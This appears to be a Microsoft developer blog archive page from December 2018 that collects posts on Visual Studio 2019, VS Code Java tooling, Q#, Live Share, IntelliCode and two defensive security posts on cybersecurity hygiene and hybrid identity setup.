Visual Studio Code Updates for Java Developers: Rename, Logpoints, TestNG and More

December 14th, 2018 No comments

As we seek to continually improve the Visual Studio Code experience for Java developers, we’d like to share couple new features we’ve just released. Thanks for your great feedback over the year, we’re heading into the holidays with great new features we hope you’ll love. Here’s to a great 2019!


With the new release of the Eclipse JDT Language Server, we’re removing the friction some developers experienced in ensuring renamed Java classes perpetuate into the underlying file in Visual Studio Code. With the update, when a symbol is renamed the corresponding source file on disk is automatically renamed, along with all the references.


VS Code Logpoints is now supported in the Java Debugger. Logpoints allow you to inspect the state and send output to debug console without changing the source code and explicitly adding logging statements. Unlike breakpoints, logpoints don’t stop the execution flow of your application.

To make debugging even easier, you can now skip editing the “launch.json” file by either clicking the CodeLens on top of the “main” function or using the F5 shortcut to debug the current file in Visual Studio Code.

TestNG support

TestNG support was added to the newest version of the Java Test Runner. With the new release, we’ve also updated the UI’s of the test explorer and the test report. See how you can work with TestNG in Visual Studio Code.

We’ve also enhanced our JUnit 5 support with new annotations, such as @DisplayName and @ParameterizedTest.

Another notable improvement in the Test Runner is that we’re no longer loading all test cases during startup. Instead, the loading now only happens when necessary, e.g. when you expand a project to see the test classes in the Test viewlet. This should reduce the resource needed on your environment and enhance the overall performance of the tool.

Updated Java Language Pack

We’ve included the recently released Java Dependency Viewer to the Java Extension Pack as more and more developers are asking for the package view, dependency management and project creation capability provided by this extension. The viewer also provides a hierarchy view of the package structure.

Additional language support – Chinese

As the user base of Java developers using Visual Studio Code is expanding around the world, we decided to make our tool even easier to use for our users internationally by offering translated UI elements. Chinese localization is now available for Maven and Debugger, it will soon be available for other extensions as well. We’d also like to welcome contributions from community for localization as well.

IntelliCode and Live Share

During last week’s Microsoft Connect() event, we shared updates on the popular Visual Studio Live Share and Visual Studio IntelliCode features. The new IDE capabilities – all of which support Java – provide you with even better productivity with enhanced collaboration and coding experience that you can try now in Visual Studio Code.

Just download the extensions for Live Share and IntelliCode to experience those new features with your friends and co-workers. Happy coding and happy collaborating!

Attach missing sources

When you navigate to a class in some libraries without source code, you can now attach the missing source zip/jar using the context menu “Attach Source”.

We love your feedback

Your feedback and suggestions are especially important to us and will help shaping our products in future. Please help us by taking this survey to share your thoughts!

Try it out

Please don’t hesitate to try Visual Studio Code for your Java development and let us know your thoughts! Visual Studio Code is a lightweight and performant code editor and our goal is to make it great for the entire Java community.

Xiaokai He, Program Manager
@XiaokaiHeXiaokai is a program manager working on Java tools and services. He’s currently focusing on making Visual Studio Code great for Java developers, as well as supporting Java in various of Azure services.


Get to code: How we designed the new Visual Studio start window

December 13th, 2018 No comments

By now, many of you may have noticed a very prominent change to the launch of Visual Studio in Visual Studio 2019 Preview 1. Our goal with this new experience is to provide rapid access to the most common ways that developers get to their code: whether it’s cloning from an online repository or opening an existing project.

New start window in Visual Studio 2019

A month ago, we shared a sneak peek of the experience (in the blog post A preview of UX and UI changes) and mentioned the research and observation that we used as input into the design and development. This is the story about how we got there.

How & why we began this journey

Two years ago, we reinvented the Visual Studio installation experience to offer developers the ability to install exactly what they need and reduce the installation footprint of Visual Studio. We broke Visual Studio down into smaller packages and components and then grouped them together into development-focused workloads (which are bundles of packages and components). We quickly realized that the installation was just one piece of the journey our users take when they are getting started with Visual Studio.

We began to think more broadly – beyond just the installation of the bits, to explore the developer journey of getting to code. This journey starts from the moment you think about that great idea for an app all the way to writing your first lines of code, and integrating Visual Studio into your daily routine. To help us understand what developers were doing throughout their first launch, we built a data informed model of the customer journey.

Our Visual Studio Customer Journey

These insights helped improve installation success rates and address common failures but lacked the ability to answer questions around why some users drop off from one step to the next and how do we make sure Visual Studio meets the need of millions of developers? Some of you may even be trying to better understand how to make your own consumer or business customers more successful with your products.

So, from there we turned to existing mechanisms like surveys, interviews, social media (blogs), and A/B experimentation to help us understand where and how to improve these experiences. The surveys received an overwhelming number of responses (thank you to those of you who contributed!) and provided us with a foundation of anecdotes that helped us understand our individual users even more. They helped us recognize the different types of users coming into our “front door”, which is to say the first place they learn about Visual Studio and decide to download it. We identified through early cohort analysis, that almost half (50%) of users downloading were brand new to Visual Studio (but not necessarily new to coding) and only some of those users came back to Visual Studio for a second time. This was a surprising moment for us as we had no idea why this was happening!

Going beyond the data

We knew we needed deeper insights into how we could help new users be successful with their first time in Visual Studio and assist them in making the best choices along their journey. Fundamentally, we wanted to identify what the “Magic Moment” would be for them in Visual Studio. The “Magic Moment” is a phrase commonly used by product teams that maps a set of events or an experience a user has with a product that transforms them from a casual user trying something out to an avid, loyal user who finds success and even promotes the product. This moment is at the very core of identifying patterns to indicate users who will integrate a product or tool into their daily routine. We didn’t know what our Magic Moment was just yet, but we had a lot of ideas on what we believed it might be, so we asked ourselves:

Is there something new Visual Studio users do in the IDE that indicates they will return or abandon after 5 minutes?

We set out to answer this question by:

  1. Observing developers, both brand new to Visual Studio and seasoned, as they find Visual Studio to download, configure, and start writing code.
  2. Identifying the problems that they encountered throughout their journey to code.
  3. Building hypotheses and concepts around getting to a “Magic Moment.”
  4. Validating the hypotheses and concepts via an iterative process of weekly testing and experimentation.

Our iterative process from interns to external users

We started by asking our summer interns to install and use Visual Studio for the first time in our user experience (UX) lab and document their journey. We were surprised at how long and difficult the journey from download to writing and running code was for them. We also gained insights into their expectations for Visual Studio based on other editors and IDEs they had previous experience with.

Our first step was simple: we gave participants a clean virtual machine with only Windows 10 installed and asked them to find, install, use Visual Studio, and “do whatever is natural to you to get started.”

We then just watched…

One of our participants in the User Experience lab

Turns out even students think the 40 year-old concept of writing a “hello world” app is a great starting place. What also became extremely clear to us was that moment when users were writing and running code – we saw them become more engaged with Visual Studio and having fun. We saw an emotional change when they wrote their own code, compiled it, fixed some things, and ran it. We had a strong inkling that we were even closer to the “Magic Moment.”

We then scaled up our research to bring in more new and experienced developers every week. We tested out many ideas using low fidelity mockups built in PowerPoint and eventually moved to higher fidelity prototypes. We tried variations of tasks and UIs as we tested our assumptions. There were multiple problems to solve but one of the most significant became clear when we saw new Visual Studio developers struggle when trying to open code or create a new project. The first view of Visual Studio was overwhelming with no clear guidance of what they should do first. So, we set out to focus on that stage of the journey in our designs and storyboards for Visual Studio 2019. The design process looked a little something like this:

Visualizing the friction points in the customer journey

Evolution of our start window designs

Bringing all our insights into Visual Studio 2019

From all the design explorations, experiments, and observations, evolved an idea of the start window which would offer a focused experience to quickly get you to writing those first lines of code. Given our insights, we wanted to ensure users, especially those new to Visual Studio (some who are already experienced in other development tools), could quickly experience that “Magic Moment” of writing their first lines of code and successfully run it each and every time.

The start window would support new Visual Studio users by:

  1. Highlighting the choices, they must make during the early, crucial steps of getting started with Visual Studio.
  2. Removing distractions and providing suggestions for the best path forward.
  3. Enabling a search and filter focused experience for creating a new project.
  4. Promoting a streamlined online repository-first workflow.

Developers who are already well-versed and experienced with Visual Studio might be wondering what’s in it for them. What we’ve heard from experienced developers is that onboarding junior developers is very challenging, so we believe the new start window is a step towards ensuring they are more successful in getting to their code each time they open the IDE. We will also continue to preserve and enable existing workflows in the start window to support the muscle memory that experienced users have established with Visual Studio. Lastly, seasoned developers in the user experience lab were delighted by the new “Clone and check out code” experience which brings your online repositories right to your fingertips on launch.

Anatomy of the start window

We know the list of recent projects and solutions is one of the most common ways developers open code, so it was very important that we maintain this list in the most prominent part of the start window. We also knew it was VERY important to not break existing flows where developers open projects/solutions from the desktop (by double-clicking) – so the start window will never show in this flow, as your code will always take priority and open immediately.

Bringing a more focused, source-first experience of clone and check out code (like the Start Page had) to the forefront of Visual Studio was an opportunity to not only show new users the power of source providers like GitHub and Azure DevOps. We have also heard from our research with developers that this action is a more prominent part of a their daily workflow.

Opening a project or solution brings forward the concept of Visual Studio project and solution files that you can click on to open your entire codebase if you have an MSBuild-based solution. But if you use a non-MSBuild build system, such as CMake, then we would recommend opening a local folder instead. We’ve been investing in support to allow you to browse, edit, build, and debug any code without a .sln or project file. You can learn more about Open Folder, including how to configure a different build system to work with it, in our documentation. In addition, if you want to browse loose files in Visual Studio, you can just open the containing folder and pick up the file from the folder view of Solution Explorer.

Creating a new project is a big part of getting to your code in Visual Studio even when it’s prototyping some throwaway code in a simple template (like the Console App) or trying out the capabilities of a new platform or language for the first time. Based on the workloads you install, you’ll always see the most commonly used templates first. We’ve observed that developers first think about the kind of application they want to build (a mobile app, a website, etc.) and not the language – so we removed the language centric tree hierarchy and have improved searching and filtering to help you get to the right template more quickly. You’ll also find a more prominent list of recently used templates so you can quickly get back to your favorite template with a single click.

Lastly, continue without code offers developers a one-time escape from the window for the times when a different action is needed to start work (like joining a Live Share collaboration session, or attaching to a process). Alternatively, hitting the ESC key will also dismiss the window and immediately bring up the IDE. If there are other scenarios that you perform frequently and think should have a home on the start window (like for example attaching to a debugger), please upvote or create a suggestion in our Developer Community.

What’s next for this experience

In just a week, after releasing Visual Studio 2019 Preview 1, we’ve heard developers tell us the start window provides a “focused way to get to the most common things.” We’re already working on some of your feedback, such as support for Team Foundation Version Control and better scan ability in the recent solutions/projects list.

The start window experience is just one part of the journey we’re on to continue to streamline the onboarding experience to Visual Studio. Our longer-term vision includes improvements like reducing the number of choices required to download and install and offering relevant samples and tutorials to assist when learning a new language or platform.

Tell us what you think

As you can tell from the journey we’ve taken to get here, your feedback is essential to making this experience better. We’d love to have you try it out for a few hours in your everyday work. If it still doesn’t jive with you, then you can revert to the previous Visual Studio ‘start’ behavior. Go to Tools > Options and search for ‘Preview Features’ which will allow you to configure this setting along with a few other preview features. Alternatively, you can find the option in Tools > Options | Environment | Startup.

Tools | Options settings for Preview Features

After you’ve experienced Visual Studio 2019 Preview 1, please help us make this the best Visual Studio yet by letting us know what you like or tell us what is not working well for you. And of course, if you run into any issues, please let us know by using the Report a Problem tool in Visual Studio. You can also head over to the Visual Studio Developer Community to track your issue or, even better, suggest a feature, ask questions, and find answers from other developers.

Cathy Sullivan, Principal Program Manager, Visual Studio Platform

Cathy Sullivan is a Principal Program Manager on the Visual Studio Acquisition team focused on ensuring developers have a smooth onboarding experience for the first time and every time with Visual Studio. She has worked on many Visual Studio Platform teams building C#/VB language features, core UI/Shell features such as Solution Explorer and designed the beloved dark theme used by many developers.

Categories: Visual Studio, Visual Studio 2019 Tags:

New Azure DevOps Work Item Experience in Visual Studio 2019

December 12th, 2018 No comments

In previous versions of Visual Studio, the work item experience was centered around queries, which need to be created and managed to find the right work items. In Visual Studio 2019, we have removed queries and added a new view for work items centered at the developer. This allows the developer to quickly find the work they need and associate them to their pending changes. Removing the need for queries.

For those users who use Visual Studio for work item planning and triage, we encourage you to do so from Azure Boards. Azure Boards is the central place to manage your backlog, triage work, and plan your sprints.

Be sure to read the full documentation on how to use the new Azure Boards work item experience in Visual Studio 2019.

Work Items Hub

The Work Items Hub in Visual Studio 2019 has many of the same views found in the Work Items Hub in Azure Boards. It is where developers can quickly find the work items that are important to them. Filters and views can provide specific lists of work items such as Assigned to Me, Following, Mentioned, and My Activity. From any these views you can do quick do inline edits, assign work, create branches, and associate work to pending changes.

Create branches and relate work

Create a branch directly from a work item. This will automatically associate that work item to any current changes. Alternatively, you can relate a work item to a current set of changes already in progress. You can associate as many work items to a commit as you would like.

#Mention in commit message

Search and select work items directly from the commit message. Associate as many work items to the commit as you would like.

We need your help

We want to make the best experience for developers who use Azure Boards in Visual Studio. Please provide your feedback by sending us bugs and suggestions. You can contact us on Twitter at @danhellem or @AzureDevOps..

Dan Hellem, Program Manager, Azure DevOps

Dan is a Program Manager with Microsoft’s Azure DevOps on the Azure Boards team. Before coming to Microsoft in 2012, Dan spent his career building applications using Microsoft technologies and assembling Agile teams centered on delivering high quality software to users.

A Year of Q#

December 11th, 2018 No comments

The Quantum Architecture and Computation group launched Q#, our quantum computing programming language, a year ago on December 11th, 2017.

Q# 0.1 was the result of a lot of hard work from a small, dedicated team of developers, researchers, and program managers. We had made the decision to build a domain-specific language for quantum computing about six months before we launched, so we were on a very tight schedule. We were lucky to have a great team of people who all pitched in and did what needed to be done so that we could meet our extremely aggressive timetable.


Inside the team, we speculated on what level of interest Q# would attract. We hoped that we might receive a few hundred downloads, but we were blown away when we crossed 1,000 users by about 9 hours after launch. That said, with so many users installing the Quantum Development Kit and trying to write simple programs in it, bugs started popping up. In order to deliver the best experience for our users, we released a patch in January that addressed issues like floating-point literals that were handled incorrectly in certain locales, and allowed the simulator to run on older machines without vector instructions support.

We also addressed portability feature requests in our 0.2 release in February 2018, which saw us move from the .NET Framework to the open-source, cross-platform .NET Core. This allowed us to easily support macOS and Linux as well as Windows for building and running Q# code. We also added support for VS Code on all platforms (the 0.1 release was limited to Visual Studio on Windows). As part of the 0.2 release, we were able to make the majority of our libraries and samples available under an MIT license.

Long Hot Summer

We decided to take advantage of one of our team members’ expertise in organizing coding competitions and run a Q# coding competition to engage non-quantum developers with Q# and quantum computing. After a couple of months of preparation, we ran the Q# Coding Contest in early July. Again, the results exceeded our expectations: 514 participants in the warmup round, and 389 in the actual contest. 100 participants solved all the problems, and a lot of them even asked for more challenging ones!

To help make Q# and quantum computing more accessible to the public, we also launched self-paced programming tutorials: the Quantum Katas. We’re up to 10 katas already, and more are coming!

Spring, Summer, Autumn

We started planning the next major release in the spring of 2018, after shipping our 0.2 release: we wanted to rebuild our compiler to work as a language server, to give Q# developers the same interactive error checking and IntelliSense features they’re used to for languages like C# and F#. We knew this would be a huge amount of work and would require a significant re-architecture of the compiler in order to work incrementally. We didn’t want to wait longer to do this work, though, because we wanted to give our users the kind of modern programming environment they’re used to.

We spent the spring and summer re-architecting and rewriting the Q# compiler and shipped the new Q# compiler as our 0.3 release at the end of October.

The 0.3 release also includes a new, open source quantum chemistry library. This library integrates with NWChem, a powerful and popular open source computational chemistry package. The integration is based on the open source Broombridge schema.

Whatever Next

What’s next for Q#? No spoilers (yet!).

The last blog post of the calendar, scheduled for December 24th, will look at some of the things we’re considering for Q# in the coming year.

Until then, enjoy the holidays!

Congratulations to everyone who can figure out what the section titles have in common…

Alan Geller, Software Architect, Quantum Software and Applications

Alan Geller is a software architect in the Quantum Architectures and Computation group at Microsoft. He is responsible for the overall software architecture for Q# and the Microsoft Quantum Development Kit, as well as other aspects of the Microsoft Quantum software program.

Categories: Q#, Quantum, Visual Studio Tags:

New Benefits in Visual Studio Subscriptions

December 11th, 2018 No comments

Last week at Microsoft Connect();, we announced two new benefits to assist cloud migration for our users who have Visual Studio Subscriptions. If you missed the event or want to watch the on-demand trainings, check out the Connect(); event page. If you’re a current Visual Studio subscriber, activate your new benefits to get started right away. To learn more about our developer subscriptions and programs visit the Visual Studio website.

Here are more details on the two new benefits:

CAST Highlight

Developers need critical insights on their software when migrating to the cloud. With CAST Highlight, Visual Studio Enterprise subscribers can rapidly scan their application source code to identify the cloud readiness of their applications for migration to Microsoft Azure and monitor progress of their app both during and after a migration. Check out this video from CAST to see it in action.

Visual Studio Enterprise subscribers can get a free, full-featured one-month subscription to CAST Highlight for up to five apps per subscriber.

UnifyCloud’s CloudPilot

Developers also need solutions that enable quick and easy app migration to the cloud. CloudPilot helps move apps to Microsoft Azure in a few easy steps, including identifying all required changes down to the line of code for successful migration to containers, virtual machines, App Service, Azure SQL, and SQL Managed Instance. See this video from UnifyCloud to learn more about CloudPilot.

Visual Studio Enterprise subscribers are eligible for two 90-day free licenses to the full-featured CloudPilot, while Visual Studio Professional subscribers can take advantage of one 30-day license to scan apps and databases of millions of lines of code in minutes.

Log into the Visual Studio Subscriptions portal at today to get your new benefits.

Let us know what you want to see with the Visual Studio Subscriptions by sharing your feedback, suggestions, thoughts, and ideas in the comments below!

Lan Kaim, Director of Product Marketing

Lan is a Director on the Azure marketing team where she is responsible for the developer subscription business.

New Preview label for Visual Studio extensions

December 7th, 2018 No comments

Visual Studio extensions can now be marked with a Preview label which is shown very clearly on the Visual Studio Marketplace. This gives your customers clear expectations that this version could contain issues as you are actively developing new features. You can get feedback from your users earlier, test out new code changes to improve your extension, and continue to provide a stable version for your users that may require it.

Determining the quality of an extension is today an exercise left to the extension user. If an extension isn’t recommended by a friend, coworker or other trusted person, all we can do is to look at the number of downloads, the star rating, and reviews to determine if we perceive the quality to be high enough for us to try out the extension.

The new preview label explicitly communicates some important details to the consumer about what to expect from the extension. This helps them to understand that the extension may not be feature complete and may contain bugs. It can also help to communicate to them that feedback is welcome to improve the extension before its final release and the preview label removed.

If the version of your extension is less than one (i.e. v0.5) then it will likely benefit from adding the preview label.

Add the preview label

In your extension’s .vsixmanifest file, add the new <Preview> element to the <Metadata> node.

  <Identity Id="[guid]" Version="0.8" Language="en-US" Publisher="My name" />
  <DisplayName>Extension name</DisplayName>
  <Description>Extension description.</Description>

Now upload your extension to the Visual Studio Marketplace to see the new preview label show up. If your extension isn’t uploaded but referenced by a link, then there is a checkbox you can check to add the preview label when you edit your linked extension on the Marketplace.

It’s important to note that the extension will not change behavior in any way due to the addition of the preview label.

Try it out

If you have any applicable extensions, then use the preview label to better communicate the right expectations to your users and get a better chance at higher ratings.

Mads Kristensen, Senior Program Manager

Mads Kristensen is a senior program manager on the Visual Studio Extensibility team. He is passionate about extension authoring, and over the years, he’s written some of the most popular ones with millions of downloads.

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

December 6th, 2018 No comments

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting your organizations data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization’s resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we dont even realize how powerful the protection of these behaviors are until that day deep in January when you look around your office and realize you are one of the only people who isnt sick. Thats what cybersecurity hygiene does; it strengthens your organizational immune system. Its a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three because big salads make your stomach bloat and youd rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but dont help advance a strategic agenda. A little like that candy bardrawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, its not uncommon to have those goals diverted in a different waychasing the latest trend that the board is excited about or having to react to failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systemswhen we eat more vegetables our microbiome changes, it becomes easier to digest those veggies and can actually begin craving them. But if you stock the pantry with candy instead of leafy greens, its hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weakness. Its a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you arent as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities and allocate your money appropriately. Create strategic cybersecurity targets and goals for the next one, three, and five years and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan and when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend getting started with the following to all our clients, big and small:

  • Back up data: Make sure you have a regular process to back up your data to a location separate from your production data and encrypt it in transit and at rest.
  • Implement identities: A good identity and access management solution allows you to enable a single common identity across on-premises and cloud resources with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patching: A strategy to ensure all of your software and hardware is regularly patched and updated is important to reduce the number of security vulnerabilities that a hacker can exploit.

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to start? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Information Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Visual Studio Live Share for real-time code reviews and interactive education

December 6th, 2018 No comments

Collaborating with your team using Visual Studio Live Share keeps getting easier! Since making Live Share available for the public use at BUILD last May, we’ve heard so much great feedback from our users, which has helped guide us in continuing to build a tool that truly enables developers to collaborate in all the ways they need from the comfort of their favorite tools. Your feedback has pointed us towards new collaboration scenarios that we had not previously thought of (e.g. technical interviews and hackathons), as well helped us prioritize releasing some of the biggest feature requests and issues, like sharing multi-root workspaces, making it easier to visually interact with a Live Share session, as well as allowing guests to start a debugging session. We’ve come a long way, and we have so much more collaboration goodness to bring you! If you haven’t checked out Live Share yet, get started collaborating today!

Live Share + Visual Studio 2019

After installing the Visual Studio 2019 Preview, you’ll immediately notice a Live Share button in the top-right corner of your IDE. Starting with Visual Studio 2019, Live Share is now installed by default with most workloads, making it easier than ever to start collaborating with your teammates.

For a quick overview of how to get started with Live Share, we have a walkthrough for you to watch:

We’ve also been working to bring features to enable better Live Share support for Visual Studio users. For our public preview release, we announced universal language support for all languages and platforms. We’re happy to say we’ve continued to expand this capability and have recently added language support for more languages, including: C++, VB.NET, and Razor, with F# and Python on the way soon.

Additionally, one of the top feature requests from Visual Studio users of Live Share was enabling Solution View for guests. Now, you will see the project-based view of the codebase, rather than the “folder view”. The guests and host no longer have different views into the project, and now have the same view, as if they were all developing locally.

Real-time code reviews

Another big area of collaboration among teams comes when committing your code and conducting reviews. Live Share wants to further enhance that experience and offer new ways to work with your teammates.

When a host shares their code during a Live Share session, guests will have access to the shared source control diffs. Available in both Visual Studio (with the Pull Requests for Visual Studio extension), and Visual Studio Code, guests can view the diffs to get context on what changes have been made before or during a session. This can help with having real-time code reviews in your tool of choice, or even figuring out a merge conflict.

Another aspect of the reviewing experience is comments. For that, Live Share enables in-line commenting. While in a session, participants can add comments to code for others to see in real-time. You can use this for making notes about certain changes found in a shared diff or making a to-do list of things to accomplish during the collaboration session.

To further enhance your code review experience, and ensure you can use the tools you’re already familiar with, we’re excited to announce that GitLens has added support for Live Share! As a guest, you can visualize code authorship with Git blame annotations, navigate through line/file/repo history, and view diffs between arbitrary baselines (e.g commits, branches, or tags).

Collaboration comes in so many different forms, so working with the extension ecosystem to holistically address the various ways developers work together is integral to Live Share. We’ve also partnered with other 3rd party extensions to augment Live Share collaboration sessions with their additional capabilities, like auto-sharing servers created by Live Server, sharing Test Explorer results with guests, and letting guests execute code as it is written with Quokka.js.

Interactive Education

The primary goal of Visual Studio Live Share is to enable developers to collaborate with each other more easily, and education is a scenario we care deeply about. Whether you’re mentoring a developer on your team, or giving a lecture to a classroom, Live Share provides participants with an experience that is more engaging and truly personalized to everyone’s learning needs.

While Live Share was already applicable to education, we’ve specifically addressed the following key feedback items, in order to ensure it’s further optimized for the diverse needs of instructors and students everywhere:

Get Collaborating!

If you haven’t had a chance, give Visual Studio Live Share a try! The extension is also available for download for Visual Studio 2017 and Visual Studio Code users. Additionally, it available as a default install option in the new Visual Studio 2019 Preview.

For more information about using Live Share, please check out our docs! We’re so grateful for all the amazing feedback we’ve received from you, and love hearing more. We talked a about a few new use cases we’ve optimized for based on your feedback, and we’re so excited for all the new ways we can enhance how you collaborate. As always, feel free to send us your feedback by filing issues and feature requests on GitHub.

Happy Collaborating!

Jon Chu, Program Manager
@jonwchuJon is a Program Manager on the Visual Studio Live Share team bringing collaboration tools to developers, enabling them to tell their own unique stories. Prior to Live Share he’s worked on XAML tooling and NuGet.

Step 1. Identify users: top 10 actions to secure your environment

December 5th, 2018 No comments

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. Well provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundations step to your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure Directory Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2AD, youll need to turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.


The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Visual Studio IntelliCode supports more languages and learns from your code

December 5th, 2018 No comments

At Build 2018, we announced Visual Studio IntelliCode, a set of AI-assisted capabilities that improve developer productivity. IntelliCode includes features like contextual IntelliSense code completion recommendations, code formatting, and style rule inference.

IntelliCode has just received some major updates that make its context-sensitive AI-assisted IntelliSense recommendations even better. You can download the updated IntelliCode Extension for Visual Studio and IntelliCode Extension for Visual Studio Code today! The Visual Studio extension already works with the newly-release Visual Studio 2019 Preview 1.

AI-assisted IntelliSense recommendations based on your language of choice

Many of you have requested IntelliCode recommendations for your favorite languages. With this update, we’re excited to add four more languages to the list that can get AI-assisted IntelliSense recommendations. In our extension for Visual Studio, C++ and XAML now get IntelliCode alongside existing support for C#. In our extension for Visual Studio Code, TypeScript/JavaScript and Java are added alongside existing support for Python.

We’ll be sharing more details about IntelliCode’s support for each language on their respective blogs [C++ | TypeScript and JavaScript | Java]

AI-assisted IntelliSense for C# with recommendations based on your own code

Until now, IntelliCode’s recommendations have been based on learning patterns from thousands of open source GitHub repos. But what if you’re using code that isn’t in that set of repos? Perhaps you use a lot of internal utility and base class libraries, or domain-specific libraries that aren’t commonly used in open source code, and would like to see IntelliCode recommendations for them too? If you’re using C#, you can now have IntelliCode learn patterns and make recommendations based on your own code!

When you open Visual Studio after installing the updated IntelliCode Extension for Visual Studio, you’ll see a prompt that lets you know about training on your code, and will direct you to the brand new IntelliCode page to get started. You can also find the new page under View > Other Windows > IntelliCode.  Once training is done, we’ll let you know about the top classes we found usage for, so you can just open a C# file and start typing to try out the new recommendations. We keep the trained models secured, so only you and those who have been given your model’s sharing link can access them–so your model and what it’s learned about your code stay private to you. See our FAQ for more details.

Check out Allison’s video below to see how this new feature works.

Get Involved

As you can see, IntelliCode is growing new capabilities fast. Get the IntelliCode Extension for Visual Studio and the IntelliCode Extension for Visual Studio Code to try right away, and let us know what you think.  You can also find more details about the extensions in our FAQ.

IntelliCode and its underlying service are in preview at present. If you hit issues using the new features and you’re using Visual Studio, use the built-in Visual Studio “Report a Problem” option, and mention IntelliCode in your report. If you’re a Visual Studio Code user, just head over to our GitHub issues page and report your problem there.

If you want to learn more or keep up with the project as we expand the capabilities to more scenarios and other languages, please sign up for email updates. Thanks!

Mark Wilson-Thomas, Senior Program Manager

@MarkPavWT  #VSIntelliCode

Mark is a Program Manager on the Visual Studio IntelliCode team. He’s been building developer tools for over 10 years. Prior to IntelliCode, he worked on the Visual Studio Editor, and on tools for Office, SQL, WPF and Silverlight.

Making every developer more productive with Visual Studio 2019

December 4th, 2018 No comments

